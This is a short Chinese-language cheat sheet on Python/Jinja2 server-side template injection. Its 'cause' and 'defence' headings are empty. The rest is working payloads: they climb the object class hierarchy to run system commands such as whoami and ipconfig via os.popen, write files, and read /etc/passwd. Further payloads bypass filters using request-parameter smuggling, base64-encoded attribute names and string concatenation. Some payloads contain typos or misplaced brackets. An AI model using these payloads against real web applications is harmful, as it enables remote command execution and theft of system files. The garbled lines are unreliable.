1.漏洞成因:
2.漏洞防御:
3.漏洞利用:
subclasses()[59]:是找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的)
(1)''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")
(2)''.__class__.__mro__[2].__subclasses__([59].__init__.__globals__['__uiltins__']['eval']('__import__("os").popen("whoami").read()')
(3)[].__class__.__base__.__subclasses__([59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}
(4){}.__class__.__bases__[0].__subclasses__([59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()
(5)
{%for c in %27%27.__class__.__base__.__subclasses__()%}
{%if c.__name__ == %27catch_warnings%27%}
{{c.__init__.__globals__[%27__builtins__%27]['eval']
('__import__("os"). popen("ipconfig").read()')}}
{%endif%}
{%endfor%}
4.摸板函数:
class 获取所属类 bases 获取基类 mro 此属性是在方法解析期间寻找基类时考虑的类元组 subclasses() 返回object的子类 globals 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价
5.过滤绕过:
{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()}}&path=/etc/passwd
{{ ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__
{{ ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}
class=__class__&mro=__mro__&subclasses=__subclasses__
__getattribute__使用实例访问属性时,调用该方法
{{[].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__.__subclasses__()[40]("/etc/passwd").read()}}
{{[].__getattribute__('__c'+'lass__').__base__.__subclasses__()[40]("/etc/passwd").read()}}
|